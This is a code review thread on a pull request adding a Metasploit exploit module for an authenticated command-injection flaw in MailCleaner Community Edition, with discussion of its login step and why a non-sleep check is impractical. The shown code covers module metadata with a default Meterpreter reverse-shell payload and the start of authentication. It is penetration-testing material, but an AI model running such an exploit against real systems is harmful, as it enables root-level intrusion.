modules/exploits/linux/http/mailcleaner_exec.rb

```diff
@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Mailcleaner Remote Code Execution",
+      'Description'    => %q{
+        This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an
+        operating system command under the context of the web server user which is root.
+
+        /admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing
+        operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => true,
+          'WfsDelay' => 5,
+          'Payload'  => 'python/meterpreter/reverse_tcp'
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [[ 'Automatic', { }]],
+      'Privileged'     => false,
+      'DisclosureDate' => "Dec 19 2018",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
+        OptString.new('USERNAME', [true, 'The username to login as']),
+        OptString.new('PASSWORD', [true, 'The password to login with'])
+      ]
+    )
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def auth
+    print_status('Performing authentication...')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin', '/')
+    })
+
+    if res && !res.get_cookies.empty?
```

Comment:
Can this check be improved to reduce false positives?

Reply:
Let me dive into the sh*tty details. That application requires a valid cookie during authentication. For that reason, we have to hit `/admin/` first in order to force back-end system to produce one session id for us. And then we gotta go back to`/admin/` with credentials along side cookie that taken in the first step. So in there, we are just making sure we received a cookie in the first step. Later -around line 88-92- you can see we are trying to make sure authentication successfully completed by check response status code.

About reducing false positive in a different way;

At the beginning, I was planning to implement check method. But later, I've couldn't find a way to check whether vulnerability exist or not without actively exploit the issue by using `sleep` commands. We are exploiting the vulnerability that has located at internal SOAP service. So it's not possible to execute something like `echo 1337` and search string 1337 in the http response, as a vuln validation method. (This is a bloody second order type of vuln). I hate using sleep as a validation method, it makes me uncomfortable somehow lol.

Reply:
Haha, all right. I was just wondering if there was anything to sig against in the body, for example.